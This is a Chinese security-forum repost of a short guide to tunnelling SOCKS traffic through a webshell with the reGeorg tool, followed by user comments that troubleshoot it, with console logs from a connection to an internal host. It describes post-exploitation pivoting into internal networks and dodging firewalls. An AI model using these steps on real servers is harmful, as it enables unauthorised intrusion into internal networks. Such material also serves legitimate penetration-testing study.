安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 知识学堂 > 利用webshell搭建socks代理

利用webshell搭建socks代理

时间:2017-07-28来源:WOOYUN 作者:瞌睡龙点击:
老外的开源应用 https://github.com/sensepost/reGeorg 使用示例: python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp Step 1. 上传一个脚本(aspx|ashx|jsp|php) 到web服务器上。 Step 2. 执行reGe

老外的开源应用 

https://github.com/sensepost/reGeorg 

使用示例: 

//内容来自AnYun.ORG


python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp

Step 1. 上传一个脚本(aspx|ashx|jsp|php) 到web服务器上。 

Step 2. 执行reGeorgSocksProxy.py脚本,连接shell监听端口。 
//安云网,anyun.org


** 如果你使用nmap等工具需要用到 proxychains。 

Step 3. Hack the planet :)

//copyright AnYun.ORG

//安云网,anyun.org

1#MeirLin | 2014-08-11 17:22

//本文来自安云网

前排mank //copyright AnYun.ORG

 

//安云网,anyun.org

2#Knight | 2014-08-11 17:27

//内容来自AnYun.ORG

goagent比较好用。 //copyright AnYun.ORG

 

//本文来自安云网

3#骚动侠 | 2014-08-11 18:24

//ANYUN.ORG

mark

//copyright AnYun.ORG

 

//本文来自安云网

4#西顾 | 2014-08-11 18:40

//本文来自安云网

@Knight goagent怎样利用webshell搭代理?

//内容来自AnYun.ORG

 

//内容来自安云网

5#Mujj | 2014-08-11 18:54 //安云网,anyun.org

@西顾  //ANYUN.ORG

http://vulsee.com/archives/vulsee_2017/0727_2745.html

//安云网,anyun.org


//安云网咨询系统

上传到web目录配置goagent的ini即可。 //本文来自安云网

  //内容来自AnYun.ORG

6#西顾 | 2014-08-11 21:45 //本文来自安云网

@Mujj 万分感谢   我去琢磨一下 //内容来自AnYun.ORG

  //安云网咨询系统

7#随随意意 | 2014-08-11 21:48 //安云网,anyun.org

这个代理不会卡么 //内容来自安云网

  //内容来自AnYun.ORG

8#Knight | 2014-08-11 21:53 //copyright AnYun.ORG

@Mujj 你把代码都贴出来了我还怎么装B。

//本文来自安云网

 

//内容来自安云网

9#黑色的屌丝 | 2014-08-11 22:05 //内容来自安云网

请教下这是怎么回事啊? //本文来自安云网

qq.png //copyright AnYun.ORG

 

//安云网,anyun.org

10#伟大娃娃 | 2014-08-11 22:09

//内容来自AnYun.ORG

@mujj  你他么配老子的滚轮

//安云网咨询系统

 

//本文来自安云网

11#疯子 | 2014-08-11 22:12

//本文来自安云网

@伟大娃娃 我这滚轮很好使,一下子滑到底!

//内容来自安云网

 

//安云网咨询系统

12#Mujj | 2014-08-12 08:33

//ANYUN.ORG

@疯子 你那是坏了

//ANYUN.ORG

 

//ANYUN.ORG

13#Mujj | 2014-08-12 08:33

//安云网咨询系统

@伟大娃娃 没有代码缩放真的很蛋疼。

//本文来自安云网

 

//ANYUN.ORG

[email protected] | 2014-08-12 08:48

//安云网咨询系统

看到滚轮坏的笑尿了 , 推荐 罗技G502 ,滚轮模式自由切换,一滑到底再也不是梦。 //内容来自安云网

 

//本文来自安云网

15#saber | 2014-08-12 09:34 //本文来自安云网

弱弱的问一句,这算是全局代理么?

//安云网咨询系统

 

//ANYUN.ORG

16#Jumbo | 2014-08-12 09:37

//内容来自安云网

这个咋玩。是不是跟lcx差不多 //ANYUN.ORG

  //安云网咨询系统

17#clzzy | 2014-08-12 09:54 //copyright AnYun.ORG

这会不稳定的 //安云网,anyun.org

 

//安云网,anyun.org

18#动后河 | 2014-08-12 10:29 //安云网咨询系统

收藏

//内容来自安云网

 

//内容来自安云网

19#疯子 | 2014-08-12 11:00

//内容来自AnYun.ORG

@[email protected] +1 //copyright AnYun.ORG

  //本文来自安云网

20#动后河 | 2014-08-12 11:01

//内容来自安云网

成功代理,再也不怕防火墙了,回帖感谢 //本文来自安云网

屏幕快照 2014-08-12 上午11.00.24.png //内容来自安云网

 

//本文来自安云网

21#tombook | 2014-08-12 17:19

//copyright AnYun.ORG

C:\py27>python reGeorgSocksProxy.py -p 8080 -u http://xxxxxx:8080/ //ANYUN.ORG

tunnel.php //copyright AnYun.ORG

Traceback (most recent call last):

//内容来自AnYun.ORG

  File "reGeorgSocksProxy.py", line 10, in <module> //copyright AnYun.ORG

    import urllib3 //ANYUN.ORG

ImportError: No module named urllib3

//内容来自安云网

  //内容来自AnYun.ORG

22#园长 | 2014-08-12 17:30

//copyright AnYun.ORG

这个和我写的功能一样了嘛... //内容来自AnYun.ORG

 

//内容来自安云网

23#tombook | 2014-08-12 18:28 //安云网,anyun.org

@动后河 怎么成功的

//内容来自AnYun.ORG

  //ANYUN.ORG

24#Sct7p | 2014-08-12 18:56

//安云网咨询系统

用国外webshell的做翻墙稳定吗?  关键是管理员会看到流量异常吗?  如果是某些敏感关键字经过GFW的流量关键字监控的话会被墙吗? //本文来自安云网

 

//本文来自安云网

25#徽弘 | 2014-08-12 21:21

//copyright AnYun.ORG

@tombook 安装python urllib3模块 https://pypi.python.org/pypi/urllib3 //copyright AnYun.ORG

 

//本文来自安云网

26#isno | 2014-08-13 19:09 //内容来自AnYun.ORG

我再做一个ISAPI的,效率更高点

//copyright AnYun.ORG

  //安云网,anyun.org

27#gniq | 2014-08-13 21:58 //安云网,anyun.org

mark下

//ANYUN.ORG

  //copyright AnYun.ORG

28#laterain | 2014-08-13 23:10 //copyright AnYun.ORG

解决了在不能执行命令的情况下进入内部网络的问题,十分有用,感谢!

//内容来自安云网

  //安云网,anyun.org

29#xiaolan | 2014-08-14 03:09 //内容来自AnYun.ORG

@tombook 

//本文来自安云网

urllib3要到https://pypi.python.org/pypi/urllib3下载并安装...........

//copyright AnYun.ORG

python setup.py install

//ANYUN.ORG


//本文来自安云网


//copyright AnYun.ORG


//ANYUN.ORG

@瞌睡龙

//copyright AnYun.ORG

在tomcat 5.x版本及以下中,tunnel.jsp会报错,原因是

//安云网咨询系统


//安云网,anyun.org

<[email protected] import="java.nio.ByteBuffer, java.net.InetSocketAddress, java.nio.channels.SocketChannel, java.util.Arrays, java.io.IOException, java.net.UnknownHostException, java.net.Socket" trimDirectiveWhitespaces="true"%> //内容来自AnYun.ORG


//安云网,anyun.org

trimDirectiveWhitespaces="true" 在较低版本中不支持

//本文来自安云网

去掉后客户端会提示Georg is not ready,不过在客户端中注释掉 //本文来自安云网


//内容来自安云网

    if not askGeorg(args.url): //内容来自AnYun.ORG

        log.info("Georg is not ready, please check url")

//ANYUN.ORG

        exit() //安云网,anyun.org


//本文来自安云网

后是可以用的.....(笨方法,不懂python)

//安云网,anyun.org


//本文来自安云网

不过这样搞的话虽然可以用,但是超不稳定的(流量大点就断了)...........

//安云网咨询系统

求懂python的小伙伴解决此问题.............. //内容来自AnYun.ORG

 

//ANYUN.ORG

30#mango | 2014-08-14 18:53 //copyright AnYun.ORG

3O~18%C474[QSOD1Y~8UR42.jpg怎么用!!!!

//安云网,anyun.org

  //copyright AnYun.ORG

31#顺子 | 2014-08-14 19:17

//ANYUN.ORG

@Knight 这个帖子的作用是在拿socks来渗内网的时候怎么方便一些。翻墙意义不大

//安云网,anyun.org

  //内容来自安云网

32#Sct7p | 2014-08-26 22:09

//copyright AnYun.ORG

Traceback (most recent call last): //安云网,anyun.org

  File "reGeorgSocksProxy.py", line 10, in <module> //内容来自AnYun.ORG

    import urllib3 //本文来自安云网

ImportError: No module named urllib3

//安云网,anyun.org

 

//内容来自AnYun.ORG

33#Sct7p | 2014-08-26 22:16

//本文来自安云网

C:\Users\SA\Desktop\socks 内网>python reGeorgSocksProxy.py -p 8099 -u http://10. //copyright AnYun.ORG

1.1.88/np/socks.php

//ANYUN.ORG



//copyright AnYun.ORG

           _____

//安云网咨询系统

  _____   ______  __|___  |__  ______  _____  _____   ______ //ANYUN.ORG

|     | |   ___||   ___|    ||   ___|/     \|     | |   ___|

//内容来自安云网

|     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |

//本文来自安云网

|__|\__\|______||______|  __||______|\_____/|__|\__\|______| //本文来自安云网

                    |_____|

//本文来自安云网

                    ... every office needs a tool like Georg //copyright AnYun.ORG


//copyright AnYun.ORG

  [email protected] / @_w_m__ //内容来自安云网

  [email protected] / @trowalts //ANYUN.ORG

  [email protected] / @kamp_staaldraad

//安云网咨询系统

  

//本文来自安云网


//ANYUN.ORG

[INFO   ]  Log Level set to [INFO]

//安云网,anyun.org

[INFO   ]  Starting socks server [127.0.0.1:8099], tunnel at //copyright AnYun.ORG

[http://10.1.1.88/socks.php] //安云网,anyun.org

[INFO   ]  Checking if Georg is ready //安云网,anyun.org

[INFO   ]  Georg says, 'All seems fine' //本文来自安云网

  //ANYUN.ORG

34#Sct7p | 2014-08-26 22:16 //本文来自安云网

不是全局代理? //安云网,anyun.org

 

//内容来自AnYun.ORG

35#Sct7p | 2014-08-26 22:42 //内容来自安云网

[INFO   ]  Checking if Georg is ready //内容来自安云网

[INFO   ]  Georg says, 'All seems fine' //内容来自安云网

[ERROR  ]  timed out

//内容来自AnYun.ORG

[ERROR  ]  timed out //安云网,anyun.org

[ERROR  ]  timed out //安云网,anyun.org

[ERROR  ]  timed out //内容来自AnYun.ORG

[ERROR  ]  timed out

//安云网咨询系统

[ERROR  ]  timed out //ANYUN.ORG

[ERROR  ]  timed out //安云网咨询系统

[ERROR  ]  timed out

//安云网,anyun.org

[ERROR  ]  timed out

//copyright AnYun.ORG

[ERROR  ]  timed out

//本文来自安云网

[ERROR  ]  timed out //copyright AnYun.ORG

[ERROR  ]  timed out //copyright AnYun.ORG

[ERROR  ]  timed out

//ANYUN.ORG


//copyright AnYun.ORG


//安云网咨询系统


//本文来自安云网


//内容来自安云网

连接被重置

//内容来自安云网



//内容来自AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容